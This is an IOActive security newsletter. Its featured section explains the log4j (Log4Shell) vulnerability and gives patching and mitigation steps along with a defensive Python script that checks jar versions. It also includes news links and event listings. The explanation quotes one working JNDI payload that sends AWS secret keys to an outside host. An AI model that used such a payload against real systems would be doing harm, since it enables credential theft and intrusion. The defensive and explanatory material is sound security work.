Issue 36 | December 2021

Happy holidays - IOActive Newsletter - security research, news and events

Greetings,

Season's greetings from IOActive!
The best wishes for the holidays and the new year from the IOActive team - we look forward to sharing more news from IOActive in the new year!

IOActive provides research-fueled security services—supporting our customers' critical efforts in strengthening their operational and security resiliency. Our monthly newsletter features updates on our latest security research, thoughtfully-curated security industry news, and our latest event engagements - we hope you find the information both useful and relevant.

IOActive newsletter - featured

The log4j (Log4Shell) Situation 

What happened:
A 0-day exploit was released for log4j—a Java-based logging utility that's part of the Apache Logging Services project. It is used by millions of systems worldwide to process logs. 

Impact:
People are comparing this to Heartbleed, but it's much worse in a number of ways. Heartbleed affected all TLS implementations and this one only affects systems that use log4j, but this issue produces direct and immediate harm in the form of password/key extractions and shells.

How it works:
The vulnerability is due to the insecure "lookup" functionality within log4j, which executes user-provided content as code (remote code execution, RCE). So if you provide the input `${env:PWD}`, it'll write the PWD environment variable to the log. It gets much worse from there, including the egressing of data out of the affected system and—most importantly—spawning a shell on the affected system.

Example: Here's an example from @dildog of extracting AWS Keys and listening for incoming requests.
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}

Thoughts on what to do:
The best way to fix this is to find all instances of log4j and patch them to 2.15+. If not, there are a few possible mitigations:

Patching: Upgrade to version 2.15.0.

Mitigation: For those who cannot upgrade to 2.15.0, in releases >=2.10, this vulnerability can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. Note: WAF can help but won't solve the problem. Most companies' backend systems are already clogged with these malicious payloads, from multiple ingress points. We can't fix the problem by stopping more from coming in. The only fix is securing the systems that will inevitably come in contact with that malicious input.
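The version rules in the paragraph above, as an added inventory script that is not IOActive's or Apache's code: it reads the Implementation-Version from a jar's manifest, reports which of the options applies (patched, set the no-lookups flag, or remove JndiLookup.class), and can rewrite a jar without JndiLookup.class, the same effect as the zip -d command. The jars it runs on are constructed stand-ins; real log4j-core jars carry the same manifest field.

```python
import io
import re
import zipfile

# Path of the lookup class the mitigation paragraph says to delete from the jar.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def version_key(v):
    """Sortable key for log4j version strings; pre-releases (2.0-beta9) sort before finals."""
    core, _, pre = v.partition("-")
    nums = tuple(int(x) for x in core.split("."))
    nums += (0,) * (3 - len(nums))
    return nums + ((0, pre) if pre else (1, ""))


def assess(jar_bytes):
    """Return (version, has_jndi_lookup, advice) for one jar, following the rules above."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        manifest = zf.read("META-INF/MANIFEST.MF").decode() if "META-INF/MANIFEST.MF" in names else ""
    m = re.search(r"^Implementation-Version:\s*([\w.\-]+)", manifest, re.M)
    version = m.group(1) if m else None
    has_jndi = JNDI_CLASS in names
    if version is None:
        advice = "unknown version: treat as vulnerable and inspect manually"
    elif version_key(version) >= version_key("2.15.0"):
        advice = "patched"
    elif not has_jndi:
        advice = "JndiLookup removed: mitigated"
    elif version_key(version) >= version_key("2.10.0"):
        advice = "upgrade to 2.15.0, or set log4j2.formatMsgNoLookups / LOG4J_FORMAT_MSG_NO_LOOKUPS to true"
    else:
        advice = "upgrade to 2.15.0, or remove JndiLookup.class from the jar"
    return version, has_jndi, advice


def strip_jndi_lookup(jar_bytes):
    """Rewrite the jar without JndiLookup.class (same effect as zip -q -d ... JndiLookup.class)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for name in src.namelist():
            if name != JNDI_CLASS:
                dst.writestr(name, src.read(name))
    return out.getvalue()


def make_jar(version, with_jndi=True):
    """Constructed stand-in for a log4j-core jar: only the manifest and the one class matter here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"placeholder, not a real class file")
    return buf.getvalue()
```

Pointing assess() at the bytes of every log4j-core jar found on a host (including jars nested inside WAR and EAR files) gives the inventory the paragraph asks for; strip_jndi_lookup() is only a fallback for the pre-2.10 releases where the flag does nothing.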

Detection: Many companies are using Semgrep to find vulnerable inclusions of user-provided data. Here's an example Semgrep rule from Clint Gibler of R2C/TLDRSec.

Vaccination: This is definitely on the crazier side of things, but one clever approach is to use the vulnerability to mitigate the vulnerability. Specifically, it's using the RCE functionality to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. | Code via Cybereason

Other Considerations: As David Litchfield, IOActive Business Development Director, pointed out in a number of tweets, this isn't just HTTP. Any service you have that takes input, including SMTP, IMAP, etc., is an additional attack vector. Also consider second- and N-th-order processing of content on the backend as part of batch processes and other types of automation.

Perspective from Security Research:
What is remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn't just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics:

  1. The project is maintained by very few people in their spare time for no money, and;
  2. If the project had a major issue it would disrupt the entire internet.

We simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they're creating from a security standpoint. This vulnerability will be with us for years because malicious payloads and vulnerable systems can sit dormant for any amount of time. At any moment they can come back alive and process a malicious payload that results in compromise.

Related reading:
Hackers start pushing malware in worldwide Log4Shell attacks | Dec 12
Researchers trigger new exploit by renaming an iPhone and a Tesla | Dec 13
Log4j vulnerability now used by state-backed hackers, access brokers | Dec 15
Microsoft Spots Multiple Nation-State APTs Exploiting Log4j Flaw | Dec 15

IOActive newsletter - security/industry news

CISA's KNOWN EXPLOITED VULNERABILITIES CATALOG | Dec 2021 | CISA.gov
CISA has added over 15 new vulnerabilities to their Known Exploited Vulnerabilities Catalog in December alone. The list has grown to over 300 to include: Qualcomm Chips, MikroTik Routers, Zoho (2), Apache, Adobe, Android... others. > read more

2021 CWE Most Important Hardware Weaknesses | Dec 2012 | cwe.mitre.org
MITRE and CISA announced the 2021 CWE Most Important Hardware Weaknesses List. Top hits were: improper isolation of shared resources on a SoC, improper access control for on-chip debug and test interfaces, and improper prevention of lock bit modification. > read more

Common Cloud Misconfigurations Exploited in Minutes, Report | Nov 23 | ThreatPost
PAN's Unit 42 used a honeypot of 320 systems to detect attacks against internet-facing misconfigurations in daemons like SSH, RDP, and Postgres - 80% of the systems were compromised within a week, and some were hit within minutes. > read more

Attackers don’t bother brute-forcing long passwords, Microsoft engineer says | Nov 22 | TheRecord.media
Ross Bevington, a security researcher at Microsoft, says he looked at 25 million SSH brute force attacks across Microsoft's sensor network and found that 77% of attempts were between 1 and 7 characters. Guesses over 10 characters were only seen in 6% of cases. > read more

How to Improve Red Team Effectiveness using Obfuscation | Nov 18 | securityweek

Researchers Demonstrate New Fingerprinting Attack on Tor Encrypted Traffic | Nov 15 | The Hacker News
A new analysis of website fingerprinting (WF) attacks aimed at the Tor web browser has revealed that it's possible for an adversary to glean a website frequented by a victim, but only in scenarios where the threat actor is interested in a specific subset of the websites visited by users. > read more

Millions of Routers, IoT Devices at Risk from BotenaGo Malware | Nov 12 | Threatpost
A new open source malware written in Go called BotenaGo can exploit more than 30 different vulnerabilities in routers and IoT devices. > read more

Palo Alto Networks patches 9.8 severity CVE in popular GlobalProtect product | Nov 11 | Bleeping Computer
Palo Alto Networks patched a CVSS 9.8-rated buffer overflow affecting a VPN component of its widely used firewall software, warning that the flaw allows unauthenticated attackers to execute arbitrary code on unpatched appliances. > read more

Researchers Release PoC Tool Targeting BrakTooth Bluetooth Vulnerabilities | Nov 05 | securityweek

The Booming Underground Market for Bots That Steal Your 2FA Codes | Nov 02 | vice.com
Attackers are using voice bots to automate 2FA token extraction. The bot calls the victim and at the same time a code is sent to the victim's phone. If the victim gives the bot the code, the hacker is in. > read more

Microsoft: Russian SVR hacked at least 14 IT supply chain firms since May | Oct 25 | Bleeping Computer
Microsoft says the Russian-backed Nobelium threat group behind last year's SolarWinds hack is still targeting the global IT supply chain, with 140 managed service providers (MSPs) and cloud service providers attacked and at least 14 breached since May 2021. > read more

Credit card PINs can be guessed even when covering the ATM pad | Oct 18 | Bleeping Computer
Researchers have proven it’s possible to train a special-purpose deep-learning algorithm that can guess 4-digit card PINs 41% of the time, even if the victim is covering the pad with their hands. > read more

IOActive newsletter - upcoming events

RSAC Webcast Series | Jan 18, 2022 | 1:00pm ET
John Sawyer, IOActive Director of Services, will be presenting the 'Pen-testing the Supply Chain' webcast. John will focus on how to identify risks in your software supply chain through enhanced security testing and adversary simulation. register to join the webcast

IOActive archived webinars are always available on demand!
Catch up with our most popular past research/security presentations, on topics such as: Bluetooth Low Energy testing; hacking smart cities and LoRaWAN networks; supply chain security; appsec - mobile trading apps; red/purple team services. > IOActive webinar archives

More IOActive Engagements | TBD

We're always looking for events where we can engage with our community, and more events are in the works! Additional detail will follow in the next newsletter; in the meantime, follow us on social or visit IOActive.com.

Visit ioactive.com and follow us on social to get the latest updates on IOActive research, security services, and events.


©2021 IOActive Inc. All Rights Reserved.
1426 Elliott Avenue W, Seattle, Washington 98119, USA